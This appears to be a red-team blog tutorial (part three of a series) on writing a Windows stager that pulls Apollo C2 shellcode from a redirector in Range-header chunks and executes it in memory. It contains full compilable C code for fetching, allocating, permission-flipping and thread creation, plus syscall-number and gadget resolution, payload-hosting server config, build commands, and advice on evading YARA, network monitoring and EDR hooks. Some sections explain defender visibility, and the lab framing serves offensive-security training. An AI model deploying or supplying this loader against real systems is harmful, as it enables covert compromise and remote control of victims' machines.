0x74 0x68 0x65 0x72 0x65 0x20 0x61 0x72 0x65 0x20 0x31 0x30 0x20 0x74 0x79 0x70 0x65 0x73 0x20 0x6f 0x66 0x20 0x70 0x65 0x6f 0x70 0x6c 0x65 0x74 0x68 0x6f 0x73 0x65 0x20 0x77 0x68 0x6f 0x20 0x75 0x6e 0x64 0x65 0x72 0x73 0x74 0x61 0x6e 0x64 0x20 0x62 0x69 0x6e 0x61 0x72 0x79 0x20 0x61 0x6e 0x64 0x20 0x74 0x68 0x6f 0x73 0x65 0x20 0x77 0x68 0x6f 0x20 0x64 0x6f 0x6e 0x74
01110100 01101000 01100101 01110010 01100101 00100000 01100001 01110010 01100101 00100000 00110001 00110000 00100000 01110100 01111001 01110000 01100101 01110011 0xdeadbeef 0xcafebabe 0x1337
0x74 0x68 0x6f 0x73 0x65 0x20 0x77 0x68 0x6f 0x20 0x75 0x6e 0x64 0x65 0x72 0x73 0x74 0x61 0x6e 0x64 0x20 0x62 0x69 0x6e 0x61 0x72 0x79 0x20 0x61 0x6e 0x64 0x20 0x74 0x68 0x6f 0x73 0x65 0x20 0x77 0x68 0x6f 0x20 0x64 0x6f 0x6e 0x74 0x74 0x68 0x65 0x72 0x65 0x20 0x61 0x72 0x65 0x20 0x31 0x30 0x20 0x74 0x79 0x70 0x65 0x73 0x20 0x6f 0x66 0x20 0x70 0x65 0x6f 0x70 0x6c 0x65
01010111 01100101 00100000 01101000 01100001 01100011 01101011 00100000 01110100 01101000 01100101 00100000 01110000 01101100 01100001 01101110 01100101 01110100 01100110 00110000 01111000 01100110 00110100 01100100 01100101
0x6e 0x65 0x76 0x65 0x72 0x20 0x67 0x6f 0x6e 0x6e 0x61 0x20 0x64 0x72 0x6f 0x70 0x20 0x79 0x6f 0x75 0x72 0x20 0x73 0x68 0x65 0x6c 0x6c 0x20 0x6e 0x65 0x76 0x65 0x72 0x20 0x67 0x6f 0x6e 0x6e 0x61 0x20 0x6b 0x69 0x6c 0x6c 0x20 0x79 0x6f 0x75 0x72 0x20 0x74 0x68 0x72 0x65 0x61 0x64 0x20 0x6e 0x65 0x76 0x65 0x72 0x20 0x67 0x6f 0x6e 0x6e 0x61 0x20 0x6c 0x6f 0x73 0x65 0x20 0x79 0x6f 0x75 0x72 0x20 0x70 0x61 0x63 0x6b 0x65 0x74 0x20 0x61 0x6e 0x64 0x20 0x64 0x65 0x73 0x65 0x72 0x74 0x20 0x79 0x6f 0x75 0x72 0x20 0x71 0x75 0x65 0x75 0x65
Published on

Writing a Stager

Writing a Stager

Part three. We have a range, we have Mythic, we have an Apollo agent, we have coffee, and a willingness to read technical posts. Now we need something to actually get that agent onto a target box.

I introduce, the humble stager. Before we start slinging C code around though, let's make sure we are calling it the right thing, because the terms stager and loader get used interchangeably everywhere and that causes real confusion.

A loader has the payload baked in, shellcode embedded at compile time, maybe encrypted, maybe XOR'd with a key, but it is in the binary. The loader's entire job is local, getting those bytes from inside itself into executable memory without getting caught, and no network is required.

A stager fetches the payload at runtime. It is a smaller binary that reaches out to infrastructure, pulls the real shellcode down, loads it into memory, and executes it. The shellcode never touches disk.

What we are building is a stager. It reaches out to the redirector, pulls Apollo shellcode in chunks, loads it, and runs it. That distinction matters because the two have different detection surfaces. A stager has a network fetch that a loader does not, which is an extra event source. But it also means you can rotate the payload on the server without recompiling anything. Burn the current shellcode, generate a new one, drop it in place, done. With a loader you are back to the compiler. There is a tradeoff in both directions and knowing which one you are working with helps you reason about the risks.

EDR and AV vendors use the word "stager" pretty consistently to describe binaries that fetch additional stages at runtime. If yours gets flagged, that is probably what the alert label says. Now you know why.

â„šī¸ Note

Batteries not included, same as before. You will understand what every piece does and why it is there, but if you drop this straight into a real engagement you will get caught. That is the point. Build the understanding first.


Before You Start: Snapshot

You should have a mythic-ready snapshot from the last post. Revert to it before touching anything in the range. The Apache edits we make here modify the redirector config and you want a clean baseline to go back to.

ludus range snapshot revert --name mythic-ready

If you have done work since then and want to keep it, snapshot first:

ludus range snapshot create --name pre-stager

Then revert. Get into the habit. A five second snapshot command has saved me from rebuilding the range more times than I want to admit.


Two Redirectors, Not One

The range has one redirector right now. Apache on VLAN 100 proxies matching URI paths back to Kali. The rules from part two forward /l33t and /g3t to Mythic.

We need a second function on that same box: serving the Apollo shellcode for the stager to pull down. We are using the same Apache instance because this is a lab and overcomplicating it does not help you learn. But we are going to treat it like a separate service with its own subdomain, and I want to explain why that separation matters before we configure anything.

On a real engagement, your C2 channel and your shellcode delivery should never share the same redirector. Here is what happens if they do. The shellcode fetch is a one-time event, bursty, and comparatively large. The C2 channel is low-volume beaconing every 60 seconds with jitter. If a defender is watching HTTP flows and they see a 300KB blob fetched from the same host that is generating your beacon traffic, you just correlated your stager to your agent. That is not a lead they will ignore. They can now work backwards: what delivered the stager, what does the beacon pattern look like, is this host in any other logs. You handed them the thread that unravels the whole chain.

Separate redirectors keep those two activities from looking related. The shellcode server can be burned without touching the C2 channel, the C2 redirector never serves a large blob, and the two traffic profiles on two different hosts have no obvious link between them.

In the range we approximate this with stager.redir.ludus as a virtual host on the same Apache box. The wildcard DNS rewrite *.redir.ludus that Ludus registered in part two means this subdomain resolves automatically, no additional config needed on the DNS side. In production you put these on separate infrastructure with separate providers and separate certificates. The concept is the same either way.


Setting Up the Shellcode Server

SSH into the redirector:

ssh [email protected]

Create the Apache virtual host config:

sudo nano /etc/apache2/sites-available/stager.conf
<VirtualHost *:80>
    ServerName stager.redir.ludus

    DocumentRoot /var/www/stager

    <Directory /var/www/stager>
        Options -Indexes
        AllowOverride None
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/stager_error.log
    CustomLog ${APACHE_LOG_DIR}/stager_access.log combined
</VirtualHost>

Enable it and create the directory:

sudo a2ensite stager.conf
sudo mkdir -p /var/www/stager
sudo systemctl reload apache2

Now go generate the Apollo shellcode in Mythic, Payloads then Generate New Payload:

  • OS: Windows
  • Agent: Apollo
  • C2 Profile: http
  • Output format: shellcode

Callback host c2.redir.ludus, URI /l33t, 60s interval, 20% jitter. Click Create, download the file, and drop it on the redirector:

scp apollo.bin [email protected]:/var/www/stager/a.bin

Verify it is reachable:

curl -s http://stager.redir.ludus/a.bin | wc -c

You should get the byte count back. Zero or an error means the Apache config is wrong or the file landed in the wrong place.


What PIC Actually Means

When Mythic generates shellcode output instead of an exe, it produces position-independent code. That word "position-independent" is doing a lot of work so let us break it down.

A regular Windows executable has a preferred base address baked into the PE header. When the OS loads it, the loader maps the binary's sections to specific virtual addresses and fixes up any absolute references. The exe also has an import address table that the loader has to populate before execution starts, resolving which functions from which DLLs live at which addresses at runtime.

PIC has none of that, no preferred base address, no import table, no absolute references that assume anything about where the code will land. Everything it needs it finds at runtime by walking the Process Environment Block (PEB) and crawling the loaded module list to locate functions by hash, and you can write it to any region of memory and call into it.

That is what makes it injectable. You allocate memory somewhere, copy the shellcode bytes in, and transfer execution to it. The shellcode handles the rest.

Apollo's shellcode output is a reflective loader wrapping the agent. When you execute it, the first thing it does is set itself up in memory by mapping its own PE sections, resolving its own imports, and jumping to the agent entry point. From the OS's perspective, by the time Apollo is running it looks like a DLL that loaded itself, no file on disk and no entry in the normal module list unless something goes looking for anomalous private memory regions.


Fetching in Chunks

The naive version of a stager does one HTTP GET, reads the entire shellcode file into a buffer, and writes it to memory. That works. It also looks exactly like what it is.

Network monitoring tools and flow analyzers watch for large single-response fetches from processes that have no business making network requests. A 300KB response to the very first outbound connection a freshly-executed binary makes is a pattern with a name in most detection rulesets. You are not being subtle.

Chunked delivery breaks that single request into a series of smaller ones using HTTP Range headers. Each request asks for a slice of the file, bytes 0 through N, then N+1 through 2N, and so on until you have assembled the whole thing in memory. Each individual request looks small. The traffic pattern looks more like a software update client or an MDM agent polling for patch data than a payload fetch.

There are two other benefits worth understanding. First, YARA rules and network signatures that scan for shellcode patterns in HTTP responses are looking at the content of individual responses. If you chunk small enough, no single response contains enough of the payload to match. Reassembly happens inside the stager, not on the wire. Second, the chunk size is something you should be able to tune per engagement. If the target environment runs an MDM that pulls updates in 64KB chunks, your stager should look like that. If the environment is noisier and large requests are common, you can push the chunk size up. The point is to look like traffic that already belongs there.

In this stager we use HTTP Range headers to implement chunking. Apache supports range requests by default so no server-side changes are needed. We request Range: bytes=0-8191, get the first 8KB, then Range: bytes=8192-16383, and keep going until a response comes back shorter than the requested chunk size, which tells us we hit the end of the file.

CHUNK_SIZE is a #define at the top of the code. Change it before you compile. 8192 is a conservative starting point that matches a lot of common software patterns.


Syscalls, SSNs, and Why This All Matters

Every interaction your code has with the Windows kernel goes through a syscall. VirtualAlloc, CreateThread, reading a file, opening a process handle, all of it eventually becomes a transition from user mode to kernel mode via the syscall instruction. Windows handles this transition through ntdll.dll, which exports a set of functions with the Nt and Zw prefixes. NtAllocateVirtualMemory, NtCreateThreadEx, and so on. If the user mode / kernel mode boundary is new to you, BowTiedCrawfish has a solid intro with diagrams worth reading before going further.

Each of those functions corresponds to a kernel routine, and the way the kernel knows which routine you are requesting is a number baked into the function stub. That number is the Syscall Service Number, or SSN. The stub for NtAllocateVirtualMemory in ntdll looks like this:

mov r10, rcx          ; required by syscall ABI
mov eax, 0x18         ; SSN for NtAllocateVirtualMemory (Windows 11 22H2)
syscall               ; transition to kernel
ret

The 0x18 is the SSN. The kernel reads it out of eax on arrival and routes the call to the right handler. Different Windows versions assign different SSNs to the same functions. NtAllocateVirtualMemory is 0x18 on one build and something else on another. Hardcoding these numbers is how you write stagers that crash on the wrong OS version. The correct approach is to read the SSN out of the ntdll stub at runtime by parsing the export table.

Now here is where EDRs enter the picture.

Modern endpoint products hook those ntdll stubs. They patch the first few bytes of functions like NtAllocateVirtualMemory and NtCreateThreadEx so that before the actual syscall executes, control passes through the EDR's inspection code. The EDR looks at the call context, decides if it is suspicious, and either allows it or blocks it. This is userland hooking, and it is the primary mechanism most endpoint products use to see what your code is doing.

The first counter that went mainstream was direct syscalls. Instead of calling ntdll's potentially-hooked stub, you put your own mov eax, <SSN> and syscall instruction directly in your code, bypassing the hook entirely because you never go through the hooked stub. This worked until EDRs and ETW adapted: when a syscall instruction fires from an address that is not inside ntdll's address range, that is anomalous, telemetry fires, and the Microsoft-Windows-Threat-Intelligence ETW provider logs it with everything up the stack seeing it.

"Will the real SSN please stand up?"

Direct syscalls are spotted with relative ease, so now we have indirect syscalls. Instead of emitting your own syscall, you locate a legitimate syscall; ret gadget inside ntdll's .text section and jump into it. Your code sets up the arguments and loads the SSN into eax, then transfers control to that gadget address, so the syscall instruction fires from inside ntdll's legitimate address range. From ETW's perspective it came from ntdll, and that is the whole trick.

; Direct syscall - instruction fires from your code (flagged)
mov r10, rcx
mov eax, 0x18
syscall               ; <-- your address range

; Indirect syscall - instruction fires from ntdll (looks clean)
mov r10, rcx
mov eax, 0x18
jmp <ntdll gadget>    ; jumps into ntdll, syscall fires there

The tradeoff is that you need to find the SSN for each function at runtime and locate a syscall; ret gadget inside ntdll at runtime. Neither is hard, we will write both functions below. But it is more moving parts than just calling VirtualAlloc.

Two resources worth bookmarking if you want to go deeper on the NT layer:

  • j00ru's Windows Syscall Table - a full table of SSNs across every Windows version, invaluable for understanding how they shift between builds
  • ntinternals.net - documentation for undocumented NT functions, including argument lists for things like NtCreateThreadEx that do not appear in the official SDK

One important thing to understand before we move on: indirect syscalls get you past the hooked function prologue, but they do not get you past ETW kernel events. The Microsoft-Windows-Threat-Intelligence provider fires telemetry when memory is allocated with execute permissions, when that memory is written to, and when a thread is created pointing into it, and these events fire in the kernel regardless of how you made the syscall. The syscall technique is about bypassing the userland hook. ETW is a separate detection layer and the two require separate thinking.


The Stager

Time to get in that state of mind that makes your fingers do the coding thing. We are writing this in C and walking through it section by section.

Finding the SSN at Runtime

The SSN for any NT function lives inside its ntdll stub at a fixed offset. The stub always starts with mov r10, rcx (3 bytes) followed by mov eax, <SSN> (5 bytes, with the SSN as a 4-byte immediate starting at byte 4). We read it out by parsing the export directory.

#include <windows.h>
#include <winternl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <wininet.h>

#pragma comment(lib, "wininet.lib")

#define CHUNK_SIZE 8192

typedef NTSTATUS (NTAPI *NtAllocateVirtualMemory_t)(
    HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)(
    HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
typedef NTSTATUS (NTAPI *NtProtectVirtualMemory_t)(
    HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
typedef NTSTATUS (NTAPI *NtCreateThreadEx_t)(
    PHANDLE, ACCESS_MASK, PVOID, HANDLE, PVOID, PVOID,
    ULONG, SIZE_T, SIZE_T, SIZE_T, PVOID);
typedef NTSTATUS (NTAPI *NtWaitForSingleObject_t)(
    HANDLE, BOOLEAN, PLARGE_INTEGER);

DWORD get_syscall_number(const char* func_name) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return 0;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)ntdll + dos->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)(
        (BYTE*)ntdll + nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

    DWORD* names    = (DWORD*)((BYTE*)ntdll + exports->AddressOfNames);
    WORD*  ordinals = (WORD*) ((BYTE*)ntdll + exports->AddressOfNameOrdinals);
    DWORD* funcs    = (DWORD*)((BYTE*)ntdll + exports->AddressOfFunctions);

    for (DWORD i = 0; i < exports->NumberOfNames; i++) {
        const char* name = (const char*)((BYTE*)ntdll + names[i]);
        if (strcmp(name, func_name) == 0) {
            BYTE* func = (BYTE*)ntdll + funcs[ordinals[i]];
            return *(DWORD*)(func + 4);
        }
    }
    return 0;
}

We walk the export directory, find the function by name, and read four bytes starting at offset 4 inside the stub. That is the SSN. This assumes the EDR has not replaced those bytes with hook trampoline code, which they generally do not since they hook the prologue not the SSN encoding itself.

There is a catch though. Some EDRs fully stomp the stub, in which case offset 4 gives you bytes from the trampoline, not the real SSN. Hell's Gate is where the public technique started, and Halo's Gate added the fix: walk neighboring exports instead. NT syscall numbers are assigned sequentially in alphabetical function order, so if your target is hooked but its neighbors are clean you can calculate the SSN from the surrounding ones. Tartarus' Gate and RecycledGate are the more current implementations of this and handle a wider range of hook styles.

The cleaner approach that sidesteps the problem entirely is mapping a fresh copy of ntdll from disk yourself. Open C:\Windows\System32\ntdll.dll with CreateFile and CreateFileMapping, read the SSN out of the on-disk bytes before any EDR has touched them, no neighbor-walking, no assumptions about what the hook trampoline looks like. This is where most serious implementations have landed.

Locating the Gadget

Next we need to find a syscall; ret sequence inside ntdll's .text section to use as our jump target.

void* find_syscall_gadget(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (!ntdll) return NULL;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)ntdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE*)ntdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, section++) {
        if (memcmp(section->Name, ".text", 5) == 0) {
            BYTE* base = (BYTE*)ntdll + section->VirtualAddress;
            DWORD size = section->Misc.VirtualSize;
            for (DWORD j = 0; j < size - 2; j++) {
                // 0f 05 = syscall, c3 = ret
                if (base[j] == 0x0f && base[j+1] == 0x05 && base[j+2] == 0xc3) {
                    return (void*)(base + j);
                }
            }
        }
    }
    return NULL;
}

We scan for 0x0f 0x05 0xc3, that is syscall; ret. Jump here with the SSN in eax and arguments in the right registers, and the syscall instruction fires from inside ntdll's address range. That is the point.

Same caveat as SSN resolution: sourcing the gadget from in-memory ntdll means scanning a potentially-modified image. A hardened implementation sources it from the fresh-mapped on-disk copy instead.

Where the Syscall Evasion Landscape Actually Is

A correct indirect syscall trampoline requires per-function assembly stubs. Each one loads the SSN into eax, handles Windows x64 calling convention correctly including stack argument spilling for functions with more than four parameters, then jumps to the gadget. NtCreateThreadEx takes eleven arguments. Getting the calling convention wrong means an immediate crash, not subtly wrong behavior.

This is 2026 and SysWhispers3 is signatured. The generated stub patterns, the ASM file layout, the naming conventions are all well-known to defenders, and static analysis will catch a SysWhispers3 binary on a mature endpoint before it runs. It is still useful for understanding what correct stubs look like and how the calling convention works, but not something you reach for operationally.

Where serious implementations have landed is layered, and each layer is addressing a different detection signal, not the same one repeatedly. Indirect syscalls get you past userland hooks. Everything visible after that requires something else. The later posts in this series cover those layers one at a time.

For this stager we call the NT functions through GetProcAddress, going through ntdll and any EDR hooks normally. The code demonstrates the right memory flow and will get you a callback in the lab. When you want to go further, resolve SSNs from a fresh-mapped ntdll, write per-function stubs that do not match public tooling, and swap the GetProcAddress calls. The rest of the stager does not change.

Fetching the Shellcode

BYTE* fetch_shellcode(const char* host, const char* path, SIZE_T* out_size) {
    HINTERNET session = InternetOpenA(
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!session) return NULL;

    HINTERNET conn = InternetConnectA(
        session, host, 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (!conn) { InternetCloseHandle(session); return NULL; }

    SIZE_T total_size = 0;
    SIZE_T buf_size   = 1024 * 1024;
    BYTE*  buf        = (BYTE*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, buf_size);
    if (!buf) { InternetCloseHandle(conn); InternetCloseHandle(session); return NULL; }

    DWORD offset = 0;

    while (1) {
        char range_header[64];
        snprintf(range_header, sizeof(range_header),
            "Range: bytes=%lu-%lu", offset, offset + CHUNK_SIZE - 1);

        HINTERNET req = HttpOpenRequestA(
            conn, "GET", path, NULL, NULL, NULL,
            INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_RELOAD, 0);
        if (!req) break;

        HttpAddRequestHeadersA(req, range_header, (DWORD)-1,
            HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE);

        if (!HttpSendRequestA(req, NULL, 0, NULL, 0)) {
            InternetCloseHandle(req);
            break;
        }

        DWORD status = 0;
        DWORD status_len = sizeof(status);
        HttpQueryInfoA(req, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
            &status, &status_len, NULL);

        // 206 = partial content, 200 = server ignored range and returned everything
        if (status != 206 && status != 200) {
            InternetCloseHandle(req);
            break;
        }

        BYTE  chunk[CHUNK_SIZE];
        DWORD bytes_read  = 0;
        DWORD chunk_total = 0;

        while (InternetReadFile(req, chunk + chunk_total,
               CHUNK_SIZE - chunk_total, &bytes_read) && bytes_read > 0) {
            chunk_total += bytes_read;
        }

        InternetCloseHandle(req);
        if (chunk_total == 0) break;

        if (total_size + chunk_total > buf_size) {
            buf_size *= 2;
            BYTE* new_buf = (BYTE*)HeapReAlloc(
                GetProcessHeap(), HEAP_ZERO_MEMORY, buf, buf_size);
            if (!new_buf) break;
            buf = new_buf;
        }

        memcpy(buf + total_size, chunk, chunk_total);
        total_size += chunk_total;
        offset     += chunk_total;

        if (chunk_total < CHUNK_SIZE) break;
    }

    InternetCloseHandle(conn);
    InternetCloseHandle(session);

    *out_size = total_size;
    return buf;
}

A few things here. The User-Agent is a Chrome-style string, but on a real engagement pick something that matches what the target environment actually generates. A domain-joined corporate machine running Chrome 24 hours a day generates Chrome User-Agent strings, so your stager should look like one of those requests, not like a blank WinHTTP client.

The loop breaks when a response comes back shorter than CHUNK_SIZE, which is the end-of-file signal. Apache sends 206 Partial Content for every chunk until the last one, which either returns a shorter response or a 416 Range Not Satisfiable if we asked for bytes past the end, and both cases mean we are done.

CreateThread vs NtCreateThreadEx

Before we look at the execution code, this distinction is worth understanding because it shows up in what defenders actually see.

CreateThread is the documented Win32 API that goes through kernel32.dll, which calls down into ntdll, which calls NtCreateThreadEx. Every layer of that chain is a place an EDR can hook, and it means your shellcode address gets passed as a function pointer to a publicly documented API that is logged.

NtCreateThreadEx is the NT layer function directly. Using it skips the kernel32 wrapper and gives you more control over thread creation flags, including SkipDllNotify which suppresses DLL load notifications when the thread starts, one less event source for EDRs that monitor those callbacks.

The call stack difference is visible and meaningful. With CreateThread, Process Explorer and WinDbg show the shellcode thread like this:

stager.exe!<shellcode region>         <- no symbol, unbacked memory
kernel32.dll!BaseThreadInitThunk
ntdll.dll!RtlUserThreadStart

With NtCreateThreadEx:

stager.exe!<shellcode region>         <- still unbacked
ntdll.dll!RtlUserThreadStart

You lose the kernel32 frame, but the fundamental problem is the same either way: the thread starts in memory with no module name, no symbol, and no PE header backing it. That pattern is called an unbacked thread start address and it is one of the first things analysts look for when triaging a suspicious process.

The second place the call stack tells on you is at the syscall boundary. A legitimate call to NtAllocateVirtualMemory from normal software unwinds like this:

ntdll.dll!NtAllocateVirtualMemory    <- syscall fires here
ntdll.dll!RtlAllocateHeap
ucrtbase.dll!malloc
someapp.exe!SomeFunction

Every frame maps back to a module on disk and the call makes sense going upward. With indirect syscalls you jump into the middle of an ntdll stub, so there is nothing recognizable between ntdll and your code:

ntdll.dll!NtAllocateVirtualMemory+0x9   <- jumped into the middle of the stub
stager.exe!<your code>                  <- jmp came from here, nothing between

No RtlAllocateHeap, no malloc, no coherent reason for your binary to be sitting directly below an ntdll syscall stub. EDRs with call stack unwinding know this pattern and the gap is the tell.

Viewing it yourself

Run Process Explorer as administrator on the workstation before executing the stager. Once you get a Mythic callback, find the stager process in the list, double-click it, and go to the Threads tab. The shellcode thread will have a start address that shows as a raw hex offset with no module name, something like 0x1a3bc0000. Click it, then click Stack.

In the Start Address column, legitimate threads show something like ntdll.dll!TppWorkerThread. The shellcode thread shows a raw address or <unknown>, that is the unbacked start.

You can also attach WinDbg, list threads with ~, switch to the shellcode thread with ~Ns, and run k for the call stack:

0:001> k
 # Child-SP          RetAddr               Call Site
00 000000b2`1a3ff8d0 00007ff8`c1a2e3a1     ntdll!NtWaitForSingleObject+0x14
01 000000b2`1a3ff8d8 00000001`a3bc0042     ntdll!RtlUserThreadStart+0x21
02 000000b2`1a3ff918 00000000`00000000     0x1a3bc0042

Frame 02 is your shellcode with no module, frame 01 is RtlUserThreadStart handing control into it, and frame 00 is wherever the shellcode is currently parked waiting on a handle.

Compare that to a legitimate thread:

00 ...  ntdll!NtWaitForSingleObject+0x14
01 ...  ntdll!TppWorkerThread+0x3b6
02 ...  ntdll!RtlUserThreadStart+0x21

Same ntdll functions, but TppWorkerThread is a real named thread pool function and the whole stack is module-backed. An analyst scanning threads dismisses that one immediately and clicks into yours.

Allocation, Write, Execute

int main(void) {
    SIZE_T sc_size = 0;
    BYTE* shellcode = fetch_shellcode("stager.redir.ludus", "/a.bin", &sc_size);
    if (!shellcode || sc_size == 0) return 1;

    PVOID  region      = NULL;
    SIZE_T region_size = sc_size;
    HANDLE self        = (HANDLE)-1; // NtCurrentProcess pseudo-handle

    // Allocate RW - not RWX, we flip permissions after writing
    NtAllocateVirtualMemory_t NtAlloc = (NtAllocateVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");

    NTSTATUS status = NtAlloc(
        self, &region, 0, &region_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);

    if (status != 0) { HeapFree(GetProcessHeap(), 0, shellcode); return 1; }

    NtWriteVirtualMemory_t NtWrite = (NtWriteVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");

    SIZE_T written = 0;
    NtWrite(self, region, shellcode, sc_size, &written);
    HeapFree(GetProcessHeap(), 0, shellcode);

    // Flip to RX - writable phase is done
    NtProtectVirtualMemory_t NtProtect = (NtProtectVirtualMemory_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtProtectVirtualMemory");

    ULONG old_protect = 0;
    NtProtect(self, &region, &region_size, PAGE_EXECUTE_READ, &old_protect);

    NtCreateThreadEx_t NtThread = (NtCreateThreadEx_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtCreateThreadEx");

    HANDLE thread = NULL;
    NtThread(
        &thread,
        THREAD_ALL_ACCESS,
        NULL,
        self,
        region,
        NULL,
        0,
        0, 0, 0,
        NULL);

    NtWaitForSingleObject_t NtWait = (NtWaitForSingleObject_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWaitForSingleObject");

    NtWait(thread, FALSE, NULL);
    CloseHandle(thread);
    return 0;
}

The memory permission sequence matters. We allocate PAGE_READWRITE, write the shellcode in, then flip to PAGE_EXECUTE_READ before creating the thread, and we never hold PAGE_EXECUTE_READWRITE. RWX is one of the most reliably flagged permission combinations in modern endpoint products because it literally says "I have memory I can write to and execute," and legitimate software does not do that. Splitting write and execute into two separate permission states is the right pattern regardless of everything else we are doing here.

The GetProcAddress calls resolve through ntdll directly, meaning through any EDR hooks present. To plug in SysWhispers3-generated stubs, swap each GetProcAddress block for the generated function of the same name and the rest of the code stays the same.


Building It

On Kali, cross-compile with MinGW:

x86_64-w64-mingw32-gcc stager.c -o stager.exe \
    -lwininet \
    -mwindows \
    -O2 \
    -s

-mwindows kills the console window, -s strips symbols, and -O2 lets the compiler optimize which also mildly complicates static analysis as a side effect.

Copy stager.exe to the workstation and run it. Watch for the callback in Mythic.

If nothing shows up, check a few things. Can the workstation reach stager.redir.ludus? Test with curl http://stager.redir.ludus/a.bin from the workstation. Is the shellcode x64, because Apollo shellcode for x64 will not run on a 32-bit process. Does the Mythic HTTP profile match the callback URL and URI path? Also check the Apache log on the redirector for the chunk requests:

sudo tail -f /var/log/apache2/stager_access.log

You should see a series of GETs to /a.bin with Range headers each returning 206, which means the stager is working.


What the Defender Sees

The chunk requests hit the network as a series of small HTTP GETs with Range headers. Whether this matters depends on whether the environment is doing content inspection or just flow analysis, because flow analysis sees small requests and moves on while content inspection per-request never gets the full shellcode in a single response.

In memory, four NT calls happen in sequence: allocate a region, write to it, flip permissions, create a thread. All four fire ETW telemetry through Microsoft-Windows-Threat-Intelligence regardless of how the syscall was made. The sequence of allocate-write-protect-thread into the same region is a known pattern with a name in most detection rulesets, and your stager binary is identified by that sequence.

What indirect syscalls buy you is bypassing the userland hooks in ntdll. If the EDR blocks based on hooks you get around that. If it logs based on ETW the log fires anyway, and most mature products use both layers.

The unbacked thread start address is visible to any analyst who looks at the process. Process Explorer shows it, WinDbg shows it, and the shallow call stack with no coherent origin is a tell that does not require any special tooling to see.

This stager will get caught by a tuned EDR and a curious analyst. The goal is to understand what each piece does, why the detection fires where it does, and what you would need to change to address each layer specifically. Process injection into a host process, call stack spoofing, ETW patching, those are the next layers and they are coming in later posts.


What Comes Next

  • Injection techniques, running the shellcode inside another process instead of the stager itself and why that changes the detection story
  • C2 profiles, shaping what Mythic's traffic actually looks like on the wire
  • EDR evasion, call stack spoofing, ETW patching, and where those approaches start breaking down
  • DNS C2, operating when HTTP is monitored or blocked

Each post adds a layer. By the end the chain is complete.